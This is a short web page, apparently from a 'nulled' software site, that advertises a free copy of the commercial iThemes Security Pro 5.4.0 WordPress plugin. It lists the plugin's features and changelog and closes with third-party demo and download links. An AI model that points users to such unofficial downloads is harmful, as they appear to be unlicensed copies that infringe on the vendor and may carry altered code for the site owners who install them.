Your WordPress website needs a WordPress security strategy that includes a trusted WordPress security plugin like Free iThemes Security Pro Plugin. WordPress currently powers over 25% of all websites, so it has become an easy target for hackers with malicious intent.
iThemes Security Pro takes the guesswork out of WordPress security. You shouldn’t have to be a security professional to use a security plugin, so iThemes Security Pro makes it easy to secure & protect your WordPress website.
Make sure your WordPress website is secure and protected with this WordPress Security Pro. iThemes Security Pro WordPress Plugin Free works to fix common WordPress security issues you may not know exist. By adding an extra layer of protection, iThemes Security Pro helps give you peace of mind—and keeps the bad guys out.
iThemes Security Pro WordPress Plugin Features
- WordPress Brute Force Protection
- Strong Password Enforcement
- Lock Out Bad Users
- Away Mode
- Hide Login & Admin
- Database Backups
iThemes Security Pro 5.4.0 WordPress Plugin Changelog
To update iThemes Security Pro WordPress Plugin for your site manually, please first of all create backup of your site.
- Enhancement: Log Plugin activation/deactivation/uninstall and Theme switching in the User Logging module.
- Enhancement: Log WordPress, Plugin and Theme installs & updates in the Version Management module.
- Tweak: Use Logging API for tracking Notification Center errors.
- Tweak: Register Scheduler Events whenever the plugin build changes.
- Tweak: Allow for filtering logs by any module recorded.
- Bug Fix: Account for any CLI PHP SAPI instead of just WP-CLI in the SSL Module.
- Bug Fix: Incorrect notice for delayed plugins if the custom per-plugin setting had been switched off.
- Bug Fix: Incorrect User Logging log when logging in via the Login Interstitial framework.
[stextbox id=’files-demo’ caption=’Demo’]https://www.nullwebscripts.com/xdjm[/stextbox]
[stextbox id=’custom-download’ caption=’Download’]https://www.nullwebscripts.com/1jjj[/stextbox]